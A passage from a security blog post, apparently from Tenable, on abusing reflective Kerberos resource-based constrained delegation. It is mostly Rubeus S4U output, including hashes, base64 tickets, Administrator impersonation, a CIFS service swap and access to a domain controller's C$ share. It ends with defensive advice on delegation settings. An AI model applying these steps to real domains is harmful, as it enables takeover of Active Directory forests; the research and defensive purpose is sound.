Tdr15GWMbmsQ8QBTPHKP86dRlcM+1XUJG9Y9bUPHPooM+FdTrp1AU860LLs6S0BII6qFPveWaEv1mKWqdiz4w1T5iaqfzAV6IyB1JyEeH2pEPS6mGz1jCbHryJ4NkIYVqT/jPB9HewHjysuS3grOrNHdfI4xqf7FuDXd3opUxyTrBKnYjibVrO/Cvtn22gaUFIYYMUEj00SSd0bFj03fLlANFHcTpI2sjqMGsj2myt0I29W/B4VOvPaZ4PwJQyl1TIiTAijtByOOyKOhEGCci1R9rXKf8hm8NIRgHRV25esmWoSsn7oZCB2Y0m362WpWtyNAiYmdhJR8eWaSlzl4EaksAQns0Ay/eBBapxac2KCDtDqt7iV8hxhMe2af132g4VwkIncbosXuDiENkPfdQo8F952W+I07RrFc3RBak8t8hMxqfUi3DEc8vX2xMViLi1TuCbbId6T0izIULbgazvVs2qYAhBz5QahcoIl9ykk/FHk76KVtwzno9NFj97/S8DnHwElWdsQv5wdANPBZla9/ltf4OTt3S7DGQEdHCr1Nry5MwAtnhnNaoxuMEg8rofIxkuo4HgMIHdoAMCAQCigdUEgdJ9gc8wgcyggckwgcYwgcOgGzAZoAMCARehEgQQ3shEt2MArOTfy4NpkZDrHKEMGwpBTFNJRC5DT1JQohowGKADAgEKoREwDxsNQWRtaW5pc3RyYXRvcqMHAwUAQKEAAKURGA8yMDIyMDcwODA5MjQyMlqmERgPMjAyMjA3MDgxOTI0MjJapxEYDzIwMjIwNzE1MDkyNDIyWqgMGwpBTFNJRC5DT1JQqSowKKADAgECoSEwHxsITVNTUUxTdmMbE3doYXRldmVyLmFsc2lkLmNvcnA=

______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/

v2.1.1

[*] Action: S4U

[*] Using aes256_cts_hmac_sha1 hash: 040f2dfbdc889c4139aef10cf7eb02c0ce5ab896efdb90248a1274b6decb4605
[*] Building AS-REQ (w/ preauth) for: 'alsid.corp\TestSvc'
[*] Using domain controller: 192.168.199.2:88
[+] TGT request successful!
[*] base64(ticket.kirbi):

doIFBjCCBQKgAwIBBaEDAgEWooIEETCCBA1hggQJMIIEBaADAgEFoQwbCkFMU0lELkNPUlCiHzAdoAMCAQKhFjAUGwZrcmJ0Z3QbCmFsc2lkLmNvcnCjggPNMIIDyaADAgESoQMCAQKiggO7BIIDt837DnlWoEJDgHImMnBae4i0GGXOd2D5OAVkipVKLWoiBN8e7FtHc4pSHXgewe7yPZ08Xj9mvNcCcW5Hn5dPkmWph6InIBXCBNKgDMm6uyr7NjdTm/ufbwVwKeccRamOVI5ZdnfVkXz3KxGV6BB1eaf0vB9WYrGL53LHPc1EYnlTJ6xdYDEN55pcGcNx1mb9DHC4WkhZRxiJk35WhCeFgVaptO4pt3yyWLCfd8U884UEgoNQq8ayFGCl3R4i98K3mtspus9/ZOLrCJgSSGbF7XTuGXnVIuKfWzAfwq5xNup6ZwarqQ4EFrVdvGi+GIihEGb8wryAP69k8mQwSXhHwZCMWN5frIbfcR5x/boTh/2P00BxwtG3ScRe9F/voPMbMAG+dq8NU0eIOwmMqffBRZboZj4VC88KalrYgpKKK5Sfek+qsxBnM6WEbkTapcti0QF6Fqu5iwff4VsFNuMCYlB5qwfKxkTgaTtZumQkdconrrYkWHKi6AzoiTY2zG2gXmlJsJZrjBCPDkYK9W8IXu0jiQHAKhCvXLuNzSPIok5PKLZDBgF2wEHixVAwxjZXxheSk20r1sYLAi6biVbnqAgl0oma4jDVCsYY9ACq7Z+whlWmtTSHe5Ig/CuLPGOTkAW0X1xO1XK3tCJYH/QeWKIcRB8PLVYgb//PUR7KTesBYRWTSoxq/sqxKXSvbU5DxbARQULNJxYCJbj3V56tWbNwhE9btHze5dhuH+cGdJXsyLApN9gFTb78Z/HzZYBzDL9JD1zN+TW4ry5Da1XY/bklrH2nkvocJSHi9tOi16uAtdV/+hkfg8bNur9Dph9IbkkBLTVEmDI9M2QBAwvbjvFPHEbOZk6Zz1KdSjUBr1mD0qsDG/nkH5yZPbJtai5uGB5r7GHw02wgL1dTdc0WcRBpvD8WQcIL8eej3UyQdw8tl1bn8VTyso4VBx0bwfB8eCufiB3IfsuClw88glalKusw8nhZCmWifjZIVzOn7kpcOtOnIoJ39Fxh0hE5Q59/0Owl9XLC7Qyt9twWdXF0ZfVzLeA9enw+J5NeamCTpl6MpC49vGxqVR/kb/iR8Ln2JzpIjNJrGk+C5Z8alKfQIKQIl0ZqOHVOugRFupFiBL7GKCKAvP+kVUgl2RUAvVVkfqfH3jtpZvW9ZHNhRmZG0yTlMlL0VX7MGh6XCnpV37GepLAgb804XcpZv5Fa/fZat0ybaIUzfXwwKb3/x09bpiUFmnCnMXugpG1jH/y7GDOW0nkPLPr9a6OB4DCB3aADAgEAooHVBIHSfYHPMIHMoIHJMIHGMIHDoCswKaADAgESoSIEIDPJZc7qs13t8oas+xAqRDIHRp1Ye1U5Rz7GT9fXt7xToQwbCkFMU0lELkNPUlCiFTAToAMCAQGhDDAKGwh0ZXN0dXNlcqMHAwUAQOEAAKURGA8yMDIyMDcwODA5MjY0M1qmERgPMjAyMjA3MDgxOTI2NDNapxEYDzIwMjIwNzE1MDkyNjQzWqgMGwpBTFNJRC5DT1JQqR8wHaADAgECoRYwFBsGa3JidGd0GwphbHNpZC5jb3Jw


[*] Action: S4U

[*] Loaded a TGS for ALSID.CORP\Administrator
[*] Impersonating user 'Administrator' to target SPN 'HOST/DC01.ALSID.CORP'
[*] Final ticket will be for the alternate service 'CIFS'
[*] Building S4U2proxy request for service: 'HOST/DC01.ALSID.CORP'
[*] Using domain controller: DC01.alsid.corp (192.168.199.2)
[*] Sending S4U2proxy request to domain controller 192.168.199.2:88
[+] S4U2proxy success!
[*] Substituting alternative service name 'CIFS'
[*] base64(ticket.kirbi) for SPN 'CIFS/DC01.ALSID.CORP':

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
[+] Ticket successfully imported!

We can switch between services as long as they are running in the context of the same targeted service account. Here, we forged the service class CIFS. Now let’s try to access the share C$ of the DC:

J:\>klist
Current LogonId is 0:0x868064
Cached Tickets: (1)
#0>     Client: Administrator @ ALSID.CORP
Server: CIFS/DC01.ALSID.CORP @ ALSID.CORP
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x40a50000 -> forwardable renewable pre_authent ok_as_delegate name_canonicalize
Start Time: 11/2/2022 17:44:09 (local)
End Time: 11/3/2022 3:44:09 (local)
Renew Time: 11/9/2022 17:44:09 (local)
Session Key Type: AES-128-CTS-HMAC-SHA1-96
Cache Flags: 0
Kdc Called:
J:\>dir \\DC01.ALSID.CORP\C$
Volume in drive \\DC01.ALSID.CORP\C$ has no label.
Volume Serial Number is 64CB-7382

Directory of \\DC01.ALSID.CORP\C$

02/07/2022 08:55 PM 620 2022-07-02_-55-52_DC01.cab
02/07/2022 09:45 PM <DIR> extract
02/08/2022 02:35 PM 18,874,368 ntds.dit
09/15/2018 09:19 AM <DIR> PerfLogs
02/28/2022 09:41 PM <DIR> Program Files
10/08/2021 07:03 PM <DIR> Program Files (x86)
07/07/2022 05:40 PM <DIR> tmp
06/22/2022 05:02 PM <DIR> tools
06/16/2022 03:33 PM <DIR> Users
12/16/2021 03:28 PM 8,744 vssown.vbs
05/12/2022 06:29 PM <DIR> Windows
3 File(s) 18,883,732 bytes
8 Dir(s) 23,103,582,208 bytes free

Conclusion

The reflective RBCD is a good technique to mimic the protocol transition. We can conclude that any kind of delegation to a privileged object is very dangerous because it puts at risk your entire forest if an attacker compromises the underlying service account. These dangerous delegations must not be allowed.

All Service Principal Names (SPNs) referencing a privileged object — such as a domain controller — must be removed from the msDS-AllowedToDelegateTo attribute. You can do this in the “Delegation” tab of the Active Directory Users and Computers management console. This same precaution applies to privileged objects authorizing authentication delegation thanks to Resource-Based Constrained Delegation (msDS-AllowedToActOnBehalfOfOtherIdentity).


How to mimic Kerberos protocol transition using reflective RBCD was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

❌
❌